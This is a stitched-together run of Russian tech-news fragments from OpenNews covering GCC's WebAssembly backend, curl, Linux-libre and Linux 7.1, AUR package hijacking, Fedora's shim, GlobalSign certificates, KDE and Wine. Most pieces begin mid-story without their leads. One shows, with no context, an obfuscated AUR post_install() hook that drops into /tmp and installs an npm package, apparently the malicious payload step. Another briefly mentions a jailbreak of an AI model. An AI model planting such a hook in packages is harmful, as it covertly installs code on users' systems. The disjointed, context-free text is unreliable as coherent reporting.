Бэкенд позволит использовать GCC для компиляции исходного кода на языках C/C++ в промежуточный код WebAssembly. Компиляцию в WebAssembly можно использовать для интеграции с JavaScript-проектами, запуска в web-браузере, использования в Node.js или создания обособленных многоплатформенных приложений, запускаемых при помощи WASM runtime. Бэкенд выступает генератором кода, использующим промежуточный код, подготовленный штатными фронтэндами GCC, выполняющими разбор исходного кода на поддерживаемых языках программирования и предоставляющими специфичные для них оптимизации.

Предложенная для включения в GCC реализация использует в качестве внешних зависимостей инструментарий wabt, реализацию libc для WebAssembly (wasi-libc) и компоновщик wasm-ld. Не вся запланированная функциональность реализована, например, отсутствует поддержка отладочной информации, ссылочных типов, таблиц, исключений, структуризации и операций setjump/longjump.

1. Главная ссылка к новости
2. OpenNews: Релиз набора компиляторов GCC 16
3. OpenNews: Одобрено включение в состав GCC фронтэнда для языка Алгол 68
4. OpenNews: GCC-бэкенд достиг возможности полной раскрутки компилятора rustc
5. OpenNews: Уязвимость в GCC, позволяющая обойти защиту от переполнения стека
6. OpenNews: Фронтэнд для языка Rust доведён до готовности к интеграции в GCC 13

Сообщения, отправленные через форму на Hackerone и email security@curl.se в указанное время сопровождающими рассматриваться не будут. Возможность отправки pull-запросов и сообщений о проблемах через GitHub останется доступна, но разбор накопившихся сообщений об уязвимостях начнётся только после 3 августа.

1. Главная ссылка к новости
2. OpenNews: AI-модель Claude Mythos не продемонстрировала особых достижений при поиске уязвимостей в Curl
3. OpenNews: Проект Curl избавился от использования функции strcpy в коде
4. OpenNews: Проблемы из-за подготовленных AI-инструментами отчётов об уязвимостях
5. OpenNews: В CVE опубликованы отчёты о ложных уязвимостях в curl, PostgreSQL и других проектах
6. OpenNews: Anthropic анонсировал AI-модель Claude Mythos, умеющую создавать рабочие эксплоиты

Для очистки ядра от несвободных частей проектом Linux-libre создан универсальный shell-скрипт, который содержит тысячи шаблонов для определения наличия бинарных вставок и исключения ложных срабатываний. Также доступны для загрузки готовые патчи, созданные на основе использования вышеупомянутого скрипта. Ядро Linux-libre рекомендовано для использования в дистрибутивах, соответствующих критериям Фонда СПО по построению полностью свободных дистрибутивов GNU/Linux. Например, Linux-libre используется в таких дистрибутивах, как GNU Guix System, Dragora Linux, Trisquel, Dyne:Bolic, gNewSense, Parabola, Musix и Kongoni.

В выпуске Linux-libre 7.1-gnu обновлён код чистки блобов в драйверах Nova-core, btmtk, qat_6xxx, amdgpu, m88ds3103, saa7164, r8169, ath12k, mt792x и mt7996. Решены проблемы со сборкой при использовании Rust. Обеспечена чистка блобов в новых драйверах для чипов Lontium LT8713SX DP MST и Realtek 802.11be 8922D. Произведена чистка имён блобов в dts-файлах (devicetree) для архитектуры Aarch64. Прекращена чистка драйверов fore200e, acenic, yam, smc91c92_cs и speedfax, которые были удалены из состава ядра.

1. Главная ссылка к новости
2. OpenNews: Релиз полностью свободного Linux-дистрибутива PureOS 11, используемого на смартфонах Librem
3. OpenNews: Релиз ядра Linux 7.0
4. OpenNews: Доступен полностью свободный Linux-дистрибутив Trisquel 12.0
5. OpenNews: Релиз ядра Linux 7.1

Для захвата пакетов атакующие использовали предоставляемую в AUR возможность принимать сопровождение над пакетам, оставшихся без сопровождающих и имеющих статус "orphaned". Подобная возможность предоставлялась без ограничений и проверок любому желающему. В настоящее время в AUR размещено 107406 пакетов, из которых 13050 имеют статус "orphaned" (неделю назад было 15261). За последнюю неделю в репозитории было обновлено 5578 пакетов, а за предыдущую - 3446. В репозитории насчитывается 141967 зарегистрированных пользователей и 69 сопровождающих пакеты (в предыдущую неделю было 140949 пользователей и 69 сопровождающих).

1. Главная ссылка к новости
2. OpenNews: В AUR осуществлена подстановка вредоносного кода ещё в 54 пакета
3. OpenNews: Атакующие скомпрометировали 1577 пакетов в репозитории AUR
4. OpenNews: В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов
5. OpenNews: В AUR-репозитории Arch Linux выявлены вредоносные пакеты
6. OpenNews: Arch Linux временно оставил доступ к сайту только через IPv6 из-за DDoS-атаки

В среднем пользователи меняют смартфон каждые четыре года, при том, что смена вызвана социальными факторами и желанием получить новую модель, а не выходом из строя или устареванием вычислительных возможностей. Получается, что без дела остаются миллионы устройств с относительно мощными процессорами. Google предлагает давать подобным устройствам вторую жизнь и создавать из них кластеры для облачных вычислений.

Отмечается, что производительность процессорных ядер современных смартфонов при выполнении однопоточных задач сопоставима или превосходит производительность ядер современных серверов. Например, в большинстве проведённых однопоточных тестов SPEC 2017 высокопроизводительные ядра смартфона 2023 Pixel Fold превзошли по производительности (на графике синий) ядра типового сервера ASUS RS720A-E11 (на графике прозрачная рамка) при оценке производительности отдельных процессорных ядер. Ключевое отличие в том, что серверные процессоры оснащены большим числом высокопроизводительных многопоточных ядер, в то время как SoC смартфонов сочетают небольшое число высокопроизводительных и энергоэффективных ядер. С учётом числа ядер вычислительные возможности 25-50 смартфонов рассматриваются как эквивалент современному серверу.

При построении кластера использованы только материнские платы из смартфонов, а вместо Android установлен один из серверных дистрибутивов Linux. Так как смартфоны комплектуются относительно небольшим размером ОЗУ, возможности кластера ограничиваются задачами, для которых достаточно имеющейся в одном устройстве памяти. Для упрощения оркестровки выполнения задач образующие кластер смартфоны разделены на группы по 25–50 устройств, на которых запуск приложений производится в изолированных контейнерах, управляемых через Kubernetes.

Кластер планируют ввести в строй осенью этого года и использовать для сопровождения курсов по параллельным вычислениями и системному программированию. Проведённые эксперименты показали, что кластер из 20 смартфонов выдерживает нагрузку по сопровождению курсов для более чем 75 студентов, обеспечивая задержки ниже, чем у ранее применяемого бэкенда на базе AWS. Предполагается, что кластер из 2000 смартфонов будет способен предоставить вычислительные ресурсы для сопровождения сотен курсов.

1. Главная ссылка к новости
2. OpenNews: Компания Canonical опубликовала MicroCloud 3, инструментарий для развёртывания кластеров
3. OpenNews: Выпуск кластерной ФС Lustre 2.17
4. OpenNews: Опубликована 66 редакция рейтинга самых высокопроизводительных суперкомпьютеров
5. OpenNews: Вычислительный кластер на основе Raspberry Pi и деталей конструктора Лего

В новую версию принято 17275 исправлений от 2589 разработчиков, размер патча - 57 МБ (изменения затронули 13528 файлов, добавлено 751785 строк кода, удалено 405916 строк). В прошлом выпуске было 15624 исправлений от 2477 разработчиков, размер патча - 56 МБ. Около 41% всех представленных в 7.1 изменений связаны с драйверами устройств, примерно 12% изменений имеют отношение к обновлению кода, специфичного для аппаратных архитектур, 14% связано с сетевым стеком, 5% - с файловыми системами и 3% c внутренними подсистемами ядра.

Основные новшества в ядре 7.1 (1, 2, 3):

• Дисковая подсистема, ввод/вывод и файловые системы
  • В состав принята новая реализация файловой системы NTFS - ntfsplus, основанная на коде удалённого из ядра классического драйвера ntfs. Старый драйвер был переработан, расширен возможностью записи данных и адаптирован для поддержки современных возможностей, таких как использование фолиантов страниц памяти (folios) вместо структуры buffer_head. В новом драйвере реализовано отложенное выделение блоков, позволившее добиться высокой производительности операций записи и снижения фрагментации. Для буферизированных операций записи/чтения, прямого ввода/вывода, маппинга экстентов и операций страничной записи/чтения задействована библиотека iomap. В тестах iozone драйвер ntfsplus оказался на 3-5% быстрее ntfs3 при записи в однопоточном режиме и на 35-110% при использовании 4 потоков. Скорость чтения ntfsplus и ntfs3 находится примерно на одном уровне. Драйвер ntfs3 остаётся в составе ядра и в него внесены исправления и небольшие улучшения.
  • Добавлена поддержка генерации и верификации данных проверки целостности T10 на уровне файловой системы, а не блочного устройства, что позволяет добиться повышения производительности операций чтения.
  • В драйвер блочных устройств ublk, позволяющий вынести специфичную логику на сторону процесса в пространстве пользователя, добавлена поддержка ввода/вывода через разделяемую память без копирования данных между буферами (режим zero-copy).
  • Для самошифруемых блочных устройств SED-OPAL добавлены ioctl для управления режимом Single User и реализована команда STACK_RESET.
  • В Btrfs объявлена стабильной поддержка ioctl-операции "shutdown", позволяющей перевести ФС в состояние, при котором предпринимается попытка завершения выполнения уже запущенных операций, но блокируются все новые операции.
  • В exfat реализована возможность резервированием пустых областей через вызов fallocate().
  • В ФС CIFS добавлена поддержка создания временных файлов с флагом O_TMPFILE.
  • В системный вызов fsmount() добавлена опция FSMOUNT_NAMESPACE, создающая новое пространство имён точек монитирования для монтируемой файловой системы. В системные вызовы clone3() и unshare() добавлены флаги для возвращения нового пространства имён точек монитирования, содержащего только примонтированную пустую ФС-заглушку на базе nullfs, драйвер fs-dax c ФС-интерфейсом к устройствам DAX (Direct Access).
  • В NFS-сервер добавлена защита от атак по подбору файловых дескрипторов, реализованная через заверение дескрипторов криптографической подписью. Защита включается через опцию монтирования sign_fh.
  • Добавлен символьный драйвер fs-dax, предоставляющий интерфейс для взаимодействия с устройствами DAX (Direct Access), поддерживающими работу в обход страничного кэша. Указанный интерфейс необходим для интеграции в ядро файловой системы famfs, размещаемой в оперативной памяти.
  • В файловой системе Ceph реализован сбор метрик о вводе/выводе в привязке к подразделам.
• Память и системные сервисы
  • Принята первая серия изменений для прекращения поддержки процессоров i486. Из Kconfig удалены опции для сборки ядра с поддержкой процессоров 486DX, 486SX и AMD ELAN (CONFIG_M486, CONFIG_M486SX и CONFIG_MELAN), а из Makefile исключены опции компиляции для систем i486 (-march=i486). Код для фактической поддержки работы на процессорах i486 пока оставлен в ядре, но сборка для подобных систем теперь потребует применения патчей к сборочным файлам. Причины удаления поддержки процессоров i486 обусловлены желанием избавить ядро от усложнённого кода, эмулирующего некоторые аппаратные операции, такие как CX8 (сравнить и обменять 8 байт) и TSC (счётчик циклов CPU, используемый в планировщике задач).
  • В драйвере amd-pstate, применяемом для управления энергопотреблением на системах с процессорами AMD, реализовано динамическое переключение настроек производительности и изменение поведения управления питанием в зависимости от работы от стационарного питания или аккумулятора. При стационарном подключении теперь активируется режим "performance", а при работе от аккумулятора - "balance_performance".
  • Задействован по умолчанию механизм Intel FRED (Flexible Return and Event Delivery), позволяющий повысить эффективность и надёжность доставки информации о низкоуровневых событиях. Повышение производительности и сокращение задержек обеспечивается благодаря возвращению событий при помощи процессорной инструкции IRET вместо передачи событий через таблицу IDT (Interrupt Descriptor Table). Повышение надёжности достигается благодаря раздельной обработке поступления события в контексте ядра и контексте пользователя, защиты от вложенного выполнения NMI и сохранения в расширенном кадре стека всех связанных с исключением регистров CPU.
  • В подсистему perf добавлена поддержка блоков мониторинга производительности памяти (PMU - Performance Monitoring Unit), используемых в SoC NVIDIA Tegra410.
  • Ускорено выполнение операций futex на системах ARM, благодаря задействованию инструкций Arm 9.6 LSUI, позволяющих ядру обращаться к памяти пространства пользователя без предварительного отключения режима защиты PAN (Privileged Access Never).
  • На системах с процессорами ARM улучшена поддержка расширения архитектуры набора команд MPAM (Memory System Resource Partitioning and Monitoring) и добавлена возможность её использования в пространстве пользователя для управления ресурсами через механизм resctrl. MPAM обеспечивает пометку каждого обращения к памяти идентификатором секции (PARTID, Partition ID) и идентификатором группы мониторинга (PMG, Monitoring Group ID). В привязке к PARTID можно ограничить потребление ресурсов, таких как пропускная способность памяти или размер кэша, чтобы какая-то группа задач не заняла все ресурсы. В контексте мониторинга сочетание PMG и PARTID можно использовать для отслеживание потребления ресурсов памяти при определённых видах нагрузки.
  • Добавлена возможность использования режима реального времени (PREEMPT_RT) на 32-разрядных процессорах ARM. Ранее поддержка PREEMPT_RT была обеспечена для архитектур x86 и x86-64, ARM64, RISC-V и LoongArch.
  • В системный вызов clone3() добавлены новые флаги: CLONE_NNP - запрет получения новых привилегий в созданном процессе; CLONE_AUTOREAP - автоматическое завершение процесса вместо его превращения в процесс-зомби до выполнения функции wait() родительским процессом; CLONE_PIDFD_AUTOKILL - завершение дочернего процесса в случае закрытия связанного с ним дескриптора pidfd (например, при завершении родительского процесса).
  • Для каждого модуля ядра в каталог /sys/module добавлен файл import_ns, содержащий список импортированных пространств имён символов (symbol namespace).
  • В систему асинхронного ввода/вывода io_uring добавлена поддержка использования подсистемы BPF для создания обработчиков. Например, можно заменить основной цикл диспетчеризации на BPF-программу.
  • В подсистеме BPF модернизирован анализ использования стека, что значительно ускорило проверку верификатором многих BPF-программ.
  • С целью оптимизации производительности переписана подсистема hrtimer (high resolution timer). Планировщик задач теперь может использовать таймеры с высоким разрешением без потери производительности вместо менее точных таймеров.
  • Продолжен перенос изменений из ветки Rust-for-Linux, связанных с использованием языка Rust в качестве второго языка для разработки драйверов и модулей ядра (поддержка Rust не активна по умолчанию, и не приводит ко включению Rust в число обязательных сборочных зависимостей к ядру). До версии 1.85 (поставляется в Debian 13) повышены требования к версии Rust, необходимой для сборки компонентов ядра. Добавлена экспериментальная Kconfig-опция CONFIG_RUST_INLINE_HELPERS для встраивания Си-прослоек в Rust-код во время компиляции (оптимизация ускорила работу блочного драйвера null на 2%). Добавлен макрос 'const_assert!'. Расширены возможности модулей 'sizes', 'clk', 'ptr', 'sync', 'error'.
  • В механизм SCHED_EXT, позволяющий использовать BPF для создания планировщиков CPU, добавлена начальная возможность создания вложенных планировщиков (sub-scheduler), при помощи которых для каждого cgroup можно задействовать собственный планировщик задач.
  • Продолжена оптимизация подсистемы подкачки (swap). Удалена старая структура swap_map, заменённая на механизм "Swap Table". Изменение позволило повысить производительность и уменьшить потребление памяти в подсистеме подкачки.
  • В подсистему DAMON (Data Access MONitor), позволяющую отслеживать доступ процесса к данным в оперативной памяти (например, можно узнать к каким областям памяти обращался процесс, а какие области памяти остались невостребованными), добавлена поддержка разных алгоритмов автоматического тюнинга квот.
  • В подсистеме трассировки реализована концепция внешних кольцевых буферов, позволяющая получать данные трассировки из виртуальных машин. Возможность задействована в гипервизорах KVM и nVHE для передачи данных трассировки из гостевой системы на сторону хоста.
  • В подсистему RV (Runtime Verification), предназначенную для проверки корректности работы высоконадёжных систем, добавлены компоненты мониторинга "stall" для отслеживания задач, выполнение которых временно приостановлено или заблокировано, и "deadline" для анализа поведения планировщика задач.
• Виртуализация и безопасность
  • По умолчанию выставлен флаг PROC_MEM_FORCE_PTRACE, допускающий обход прав доступа к памяти процесса через файл /proc/PID/mem только для процессов, применяющих для отладки системный вызов ptrace().
  • Добавлен новый набор hook-ов для LSM-модулей (Linux Security Module), упрощающий реализацию политик для стековых файловых систем, таких как overlayfs. В LSM также добавлен hook для управления доступом к Unix-сокетам, который задействован в LSM-модуле Landlock для назначения политик доступа к Unix-сокетам.
  • Во встроенную криптобиблиотеку lib/crypto, предоставляющую более простые и быстрые функции, чем в традиционном crypto API, добавлена поддержка алгоритмов AES-CMAC, AES-XCBC-MAC, AES-CBC-MAC, GHASH и SM3. Добавлена документация по lib/crypto.
  • Реализован режим pKVM (Protected KVM) для строгой изоляции анонимной памяти с использованием расширений виртуализации для архитектуры AArch64. В данном режиме страницы памяти гостевой исключаются из таблицы виртуальных адресов хостовой системы.
  • В гипервизор KVM добавлена поддержка пятой версии виртуального контроллера прерываний ARM (VGICv5 - ARM Virtual Generic Interrupt Controller v5).
• Сетевая подсистема
  • Для unix-сокетов, создаваемых функцией socket(), реализована поддержка расширенных атрибутов файлов (xattr) "user.*". Из областей применения отмечается выставление меток через расширенные атрибуты к Unix-сокетам, используемым для IPC Varlink, с целью их выделения из общей массы для инспектирования и отладки работы IPC при помощи BPF-программ. В systemd-journald расширенные атрибуты намерены использовать для определения формата лога в привязке к сокету /dev/log.
  • Удалена поддержка протокола UDP-Lite (RFC 3828), допускающего доставку пакетов с неправильной контрольной суммой с расчётом на то, что, например, частично повреждённые аудио и видеоданные могут быть восстановлены на уровне кодека. Протокол удалён так как им никто не пользуется.
  • Убрана возможность сборки стека IPv6 в форме модуля ядра, которая не применялась на практике (IPv6 либо встраивают в ядро, либо полностью отключают), но усложняла сопровождение так как при сборке IPv6 модулем ядра (CONFIG_IPV6=m), множество подсистем вынуждены добавлять бесполезные обработчики на случай выгрузки модуля IPv6.
• Оборудование
  • В драйвере AMDGPU включён новый дисплейный движок (DC) для APU AMD серии HD 7000 (Sea Islands, GCN 1.1).
  • В драйвер Nouveau добавлена начальная поддержка GPU NVIDIA GA100 на базе микроархитектуры Ampere.
  • Продолжена работа над drm-драйвером (Direct Rendering Manager) Xe для GPU на базе архитектуры Intel Xe, которая используется в видеокартах Intel семейства Arc и интегрированной графике, начиная с процессоров Tiger Lake. Добавлена поддержка графической подсистемы процессоров Intel Nova Lake-P. Реализованы очищаемые буферные объекты (Purgeable Buffer Objects).
  • Продолжена интеграция компонентов драйвера Nova для GPU NVIDIA, оснащённых GSP-прошивками, используемыми начиная с серии NVIDIA GeForce RTX 2000 на базе микроархитектуры Turing. Драйвер написан на языке Rust. Добавлена начальная поддержка GPU на базе микроархитектуры Turing.
  • Добавлен DRM-драйвер corebootdrm для вывода графики через фреймбуфер прошивок на базе CoreBoot.
  • Добавлена поддержка звуковых ASoC AMD RPL DMIC, Cirrus Logic CS42L43, CS47L47, NVIDIA CPCAP и WM8962. Улучшена поддержка звуковых устройств с интерфейсом USB: Huawei Headset, Focusrite 18i20, MV-Silicon, Presonus Studio 1824 и Audiobox, Arturia AF16Rig, Hotone Audio, Feaulle Rainbow, Moondrop Ju Jiu.
  • Добавлен драйвер yogafan для отслеживания скорости вращения кулера на ноутбуках Lenovo Yoga, Legion и IdeaPad.
  • Добавлена поддержка ARM-плат, SoC и устройств: Qualcomm Glymur, Qualcomm Mahua, Qualcomm Eliza, Qualcomm IPQ5210, Qualcomm apq8084 и ipq806x, Axis ARTPEC-9, ARM Zena, ARM corstone-1000-a320, Microchip LAN9691, Microchip PIC64GX, Rockchip RV1103B, Renesas RZ/G3L, NXP S32N79.
  • Удалена поддержка применяемых в SoC Baikal-T1 контроллеров AHCI SATA и PCIe, а также драйверов таймера, памяти, physmap, шины, hwmon, dwc и bt1-rom. В качестве причины удаления называется отсутствие сопровождения и незавершённая интеграция в состав ядра компонентов платформы Baikal, производство которой в РФ свернули в ноябре 2025 года.
  • Удалены 12 драйверов для Ethernet-устройств с интерфейсами ISA и PCMCIA, выпускавшихся до 2002 года, для которых не нашлись пользователи, применяющие их в рабочих системах. Также из ядра исключены подсистема ISDN, реализации протоколов AX.25, CAIF и Bluetooth CMTP (Common ISDN Application Programming Interface Message Transport Protocol), драйверы yellowfin (Yellowfin Gigabit-NIC), hamachi (Hamachi GNIC-II), hamradio (Amateur Radio), inport и logibm (busmouse). Причиной удаления стало отсутствие активных сопровождающих на фоне увеличения числа выявляемых при помощи syzbot и AI-инструментов ошибок, которые никто не берётся исправлять и вся нагрузка нa устранение серьёзных проблем ложится на сопровождающих основные сетевые подсистемы ядра. Всего удалено более 140 тысяч строк кода.

1. Главная ссылка к новости
2. OpenNews: Релиз ядра Linux 7.0
3. OpenNews: Релиз ядра Linux 6.19
4. OpenNews: Релиз ядра Linux 6.18
5. OpenNews: Релиз ядра Linux 6.17
6. OpenNews: Релиз ядра Linux 6.16

   post_install() {
       $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
   }

Тем временем зафиксирована ещё одна атака на AUR, на этот раз вместо подстановки вредоносного ПО в несколько десятков пакетов, оставшихся без сопровождающего, был добавлен вывод нецензурного сообщения на русском языке с оскорблением пользователей и предложением поменять дистрибутив или перестать использовать AUR.

1. Главная ссылка к новости
2. OpenNews: Атакующие скомпрометировали 1577 пакетов в репозитории AUR

Существующие системы без установки обновления shim продолжат загрузку до тех пор, пока открытый ключ сертификата не будет удалён из прошивки или не помещён в список отозванных сертификатов UEFI (DBX). Ключом Microsoft заверяется только загрузочная прослойка shim, в которой присутствует публичный ключ дистрибутива, применяемый для заверения загружаемых компонентов, таких как загрузчик GRUB2, ядро Linux, модули ядра и используемые при загрузке процессы, такие как fwupd. Подобный подход позволяет заверять в Microsoft только изменения в прослойке shim и самостоятельно обеспечивать верификацию процесса загрузки дистрибутива.

Сертификат Microsoft для заверения сторонних прошивок для UEFI Secure Boot действует с 2011 года. В 2023 году ему на смену сгенерирован новый сертификат, который стал применяться для формирования подписей с октября 2025 года. В репозиторий Fedora Rawhide, на базе которого формируется релиз Fedora 45, уже добавлен обновлённый shim, заверенный несколькими ключами для обеспечения максимальной совместимости с оборудованием (может использоваться как на старых прошивках без открытого ключа нового сертификата, так и на прошивках без открытого ключа старого сертификата).

Несмотря на то, что истечение срока действия сертификата Microsoft не должно повлиять на работоспособность загрузки, разработчики Fedora рекомендуют пользователям обновить БД c ключами для Secure Boot при появлении новых версий прошивок для их оборудования. Для определения факта загрузки системы в режиме UEFI Secure Boot можно использовать команду "mokutil --sb-state", а для отображения списка имеющихся в прошивке открытых ключей - "mokutil --db --short". Для просмотра ключей, которыми подписана прослойка shim можно запустить команду "sudo pesign -S -i /boot/efi/EFI/fedora/shimx64.efi", предварительно установив пакет pesign. Для проверки наличия обновления прошивки и его установки можно выполнить команду "sudo fwupdmgr update".

Следующая версия прослойки shim будет заверена только новым сертификатом Microsoft и обновление прошивки необходимо для подготовки своих систем к этому изменению. Обновление shim будет выпущено в случае выявления уязвимостей и серьёзных ошибок, что может произойти как через месяц, так и через год. За время существования shim в проекте находили критические уязвимости, при этом последний отчёт о проблемах c безопасностью в shim был выпущен лишь несколько дней назад.

В отчёте отмечены две недавно выявленные уязвимости CVE-2026-8863 и CVE-2026-10797, позволяющие добиться выполнения своего кода на раннем этапе загрузки до передачи управления операционной системе, обойти защиту UEFI Secure Boot и реализовать загрузку незаверенных цифровой подписью компонентов ядра. Проблемы затрагивают версии shim до выпуска 0.9 включительно, сформированные до 2016 года. Атаке подвержены очень старые системы, такие как RedHat Enterprise Linux 7.2, CentOS 7.2, Oracle Linux 7.2, ROSA Linux R10/R9 и openSUSE c shim 0.9. Прослойки shim до версии 0.9 включительно добавлены в базу отозванных цифровых подписей DBX (UEFI Forbidden Signature Database) и в случае обновления DBX в системе не смогут использоваться для загрузки в режиме UEFI Secure Boot.

1. Главная ссылка к новости
2. OpenNews: Ошибка в обновлении к Windows блокировала загрузку Linux при использовании UEFI Secure Boot
3. OpenNews: 6 уязвимостей в загрузчике GRUB2, позволяющих обойти UEFI Secure Boot
4. OpenNews: Разбор сути SBAT и проблем с обновлением к Windows, повлиявшим на загрузку Linux
5. OpenNews: Обзор отличий UEFI Secure Boot загрузчика Shim и решения от Linux Foundation
6. OpenNews: Удалённая уязвимость в прослойке Shim, позволяющая обойти UEFI Secure Boot

Речь ведётся о расширенных TLS-сертификатах уровня EV (Extended Validation), подтверждающих заявленные параметры идентификации и требующих не только проверки владения доменом, но и проведения удостоверяющим центром проверки существования и легального статуса компании, получающей сертификат. В браузерах при работе с сайтами, имеющими EV-сертификаты и сертификаты, полученные только через подтверждение домена, отображается одинаковый значок.

Указано, что во вступившей в силу 4 мая новой версии регламента выдачи EV-сертификатов содержится прямой запрет для удостоверяющих центров выдавать сертификаты компаниям из санкционных списков, а проверка по спискам блокировки стала не рекомендательной, а обязательной.

Данная информация не соответствует действительности, так как упомянутые требования были добавлены CA/Browser Forum в более ранней версии регламента (как минимум прослеживаются в версии 1.7.0 от 2019 года). В пункты 3.2.2.12.2 и 4.1.1.1, предписывающие проверку в санкционных списках, в новой версии документа изменения не вносились (версия 2.0.2 от 4 мая 2026 года, версия 2.0.1 от 6 мая 2024 года).

В пункте 4.1.1.1 среди условий прохождения проверки при получении EV-сертификата упомянуто отсутствие проверяемой компании в списках запрещённых организаций или организаций, подпадающих под эмбарго, в соответствии с законодательством страны, в которой зарегистрирован удостоверяющий центр. В пункте 3.2.2.12.2 указано, что удостоверяющий центр обязан проверить наличие запросившей сертификат организации в списках запрещённых персон и организаций, действующих в стране, в юрисдикции которой находится удостоверяющий центр, а также в странах, в которых удостоверяющий центр осуществляет свою деятельность. Удостоверяющий центр обязан не выдавать EV-сертификат, если запросившая сертификат организация присутствует в подобных списках или если она ведёт деятельность или зарегистрирована в стране, с которой запрещено ведение бизнеса законодательством страны, в которой зарегистрирован удостоверяющий центр.

Компания GlobalSign зарегистрирована в Бельгии и обязана выполнять санкционные ограничения, действующие в Евросоюзе. Помимо индивидуальных санкций, в Евросоюзе также действует введённый в 14 пакете санкций запрет на предоставление корпоративного ПО и оказание IT-услуг российским юридическим лицам. Предполагается, что GlobalSign до сегодняшнего дня не выполнял данные требования, пользуясь введённым в законодательство исключением, позволявшим предоставлять подсанкционным компаниям услуги для обеспечения безопасности всего интернета. Теперь выдача SSL-сертификатов квалифицирована юристами GlobalSign или регулирующими органами как оказание коммерческих IT-услуг, что подпадает под санкционные запреты.

1. Главная ссылка к новости
2. OpenNews: Объявлены устаревшими 11 методов верификации доменов для TLS-сертификатов
3. OpenNews: Let's Encrypt уменьшит срок действия сертификатов до 45 дней
4. OpenNews: Максимальное время жизни TLS-сертификатов сократят с 398 до 47 дней
5. OpenNews: GlobalSign временно приостановил выдачу SSL-сертификатов из-за возможной компрометации
6. OpenNews: Попытка получения TLS-сертификатов для чужих доменов mobi, используя просроченный домен с WHOIS-сервисом

Изменения в ветке KDE Plasma 6.8:

• Расширены возможности для определения использования тёмных тем оформления в приложениях на базе GTK 2 и применения к ним тёмных вариантов тем пиктограмм для исключения ситуаций когда в тёмном интерфейсе показываются светлые пиктограммы.
• В компоненты для интеграции с web-браузерами добавлена поддержка Flatpak-пакетов с Microsoft Edge.
• Увеличена верхняя область захвата для перетаскивания не раскрытых на весь экран окон приложений с темой оформления Breeze, по аналогии с тем, как ранее были увеличены области захвата за низ и боковые грани.
• Реализовано отображение уведомления о низком заряде аккумуляторов подключённых устройств даже при запуске программ в полноэкранном режиме, чтобы пользователь не пропустил полный разряд.
• В эффектах "Peek at Desktop" и "Window Aperture" учтены системные настройки скорости анимации.
• Представление информации и формулировки в диалогах предоставления прав доступа через систему порталов XDG (xdg-desktop-portal-kde) унифицированы с другими диалогами KDE.
• В хранителе экрана обеспечен учёт таймаута, заданного в системе через параметры PAM (Pluggable Authentication Modules), без добавления сверх них дополнительных задержек. Добавлен индикатор включения режима для людей с ограниченными возможностями, увеличивающего время удержания клавиш для срабатывания нажатия.
• В KDE Frameworks 6.28 улучшено выравнивание эскизов в диалогах открытия и сохранения файлов, а также разрешено использование по-отдельности клавиши Meta для открытия обзорного режима в KWin.
• В Qt 6.11.2 устранена ошибка, приводившая к аварийному завершению KDE Plasma при загрузке показываемых в виджете Media Player изображений обложек альбомов для контента во внешних сервисах, таких как YouTube.

1. Главная ссылка к новости
2. OpenNews: Недельный отчёт о разработке KDE
3. OpenNews: Размер кодовой базы KDE достиг 8 млн строк кода
4. OpenNews: Начало разработки KDE Plasma 6.8. Улучшение удалённой работы с рабочим столом в KDE
5. OpenNews: Бета-выпуск KDE Plasma 6.7
6. OpenNews: Фонд Sovereign выделил почти 1.3 миллиона евро на развитие KDE

Наиболее важные изменения:

• В драйвер winewayland, позволяющий использовать Wine в окружениях на базе протокола Wayland, добавлена поддержка Wayland-протокола alpha-modifier-v1, позволяющего приложениям менять уровень прозрачности поверхности и выносить операции по обеспечению прозрачности на сторону композитного сервера.
• В winewayland реализована поддержка многослойных окон (WS_EX_LAYERED), компонуемых из нескольких слоёв для реализации эффектов, таких как полупрозрачность и непрямоугольная форма окна (в wine пока реализована только полупрозрачность).
• В winewayland добавлены hints-флаги для задания максимального и минимального размера статичных окон, размер которых не может менять пользователь.
• Вместо криптографической библиотеки TomCrypt в состав включена библиотека SymCrypt, развиваемая компанией Microsoft и поддерживающая алгоритмы постквантового шифрования. Переход на SymCrypt позволил задействовать ассемблерные оптимизации операций шифрования для архитектур x86-64, ARM64, ARM и i386.
• Продолжена работа по размещению в разделяемой памяти структур данных библиотеки user32, связанных с окнами.
• Улучшена совместимость с VBScript.
• В winevulkan осуществлён переход на использование спецификации Vulkan 1.4.353. В wined3d для инициализации поддержки Vulkan задействовано расширение VK_KHR_external_fence_capabilities.
• Решена проблема со скрытием файлов, имя которых начинается с точки, в диалоге открытия файла.
• Устранены регрессии, нарушавшие нормальную работу многопоточных приложений, использующих функцию SendMessage().
• Закрыты отчёты об ошибках, связанные с работой приложений: uTorrent 3.x, Foxit Reader 8.x, Foxit PhantomPDF Business v10.0, winmine.exe, Guitar Pro v8.1.3, Sunlogin, uSimmics, MS-Money 2000.
• Закрыты отчёты об ошибках, связанные с работой игр: Space Empires V, Wreckfest, Battle.Net, Total War: Shogun 2, Spider-Man Remastered, Yesterday Origins, Think or Swim, Gray Matter, Istaria.

Дополнительно можно отметить выпуск приложения Startwine-Launcher 423, развиваемого для запуска в Linux-системах программ и игр, собранных для платформы Windows. Основной целью разработки StartWine-Launcher было упрощение процесса создания новичками префиксов Wine, - наборов библиотек и зависимостей Windows, необходимых для работы Windows-приложений в Linux. Код StartWine-Launcher написан на языке Python и распространяется под лицензией GPLv3. Интерфейс реализован на основе библиотеки GTK.

В новой версии Startwine-Launcher обновлён список версий Wine, а также обновлены префиксные конфигурации, библиотеки и драйверы в контейнере. В utils добавлены библиотеки Steam для совместимости со старыми играми. Исправлены ошибки в скрипте установки, коде обновления установленных данных приложения и во вспомогательных функциях в sw_runlib.

1. Главная ссылка к новости
2. OpenNews: Новые версии Wine 11.10 и Vkd3d 2.0
3. OpenNews: Adobe Lightroom CC при помощи AI адаптирован для работы в Linux через Wine
4. OpenNews: Стабильный релиз Proton 10.0, пакета для запуска Windows-игр в Linux
5. OpenNews: бета-версия Proton 11.0

По предположению Anthropic, поводом для предписания послужило обнаружение метода обхода защитных механизмов (jailbreak) модели Fable 5. В Anthropic заявили, что изучили продемонстрированную технику и пришли к выводу, что речь идёт об узкоспециализированном неуниверсальном обходе, позволяющем выявлять лишь небольшое число ранее известных незначительных уязвимостей, которые могут быть найдены и другими общедоступными моделями, например GPT-5.5, без какого-либо обхода ограничений.

